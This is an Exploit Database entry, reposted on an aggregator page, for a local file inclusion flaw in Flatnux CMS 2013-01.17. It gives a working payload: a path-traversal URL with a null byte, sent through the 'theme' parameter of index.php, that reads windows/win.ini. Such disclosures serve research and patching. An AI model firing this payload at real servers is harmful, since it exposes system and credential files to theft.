Flatnux CMS 2013-01.17 – ‘index.php’ Local File Inclusion

Exploit Database
13 阅读

作者： DaOne

日期： 2013-03-22
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/24870/

##########################################
[~] Exploit Title: Flatnux CMS Local File Inclusion
[~] Date: 21-03-2013
[~] Author: DaOne aka Mocking Bird
[~] Vendor Homepage: http://flatnux.altervista.org/
[~] Software Link: http://flatnux.altervista.org/download.html?f=Flatnux-Next/flatnux-2013-01.17.zip
[~] Category: webapps/php
[~] Version: 2013-01.17
[~] Tested on: Apache/2.2.8(Win32) PHP/5.2.6
##########################################

# Exploit
index.php?theme={localfile}{nullbyte}
http://localhost/flatnux/index.php?theme=../../../../../../../../../../windows/win.ini%00

last Exploits
Flatnux CMS 2013-01.17 – ‘index.php’ Local File Inclusion的更多信息

Webiness Inventory 2.3 – ’email’ SQL Injection：
Tugux CMS 1.2 – Multiple Vulnerabilities：
Check_MK 1.2.8p25 – Information Disclosure：
WordPress Plugin Booking Calendar 8.4.3 – (Authenticated) SQL Injection：
Traidnt UP 2.0 – ‘view.php’ SQL Injection：
FreiChat 9.6 – SQL Injection：
XuezhuLi FileSharing – Cross-Site Request Forgery (Add User)：
Prestashop 1.7.7.0 – ‘id_product’ Time Based Blind SQL Injection：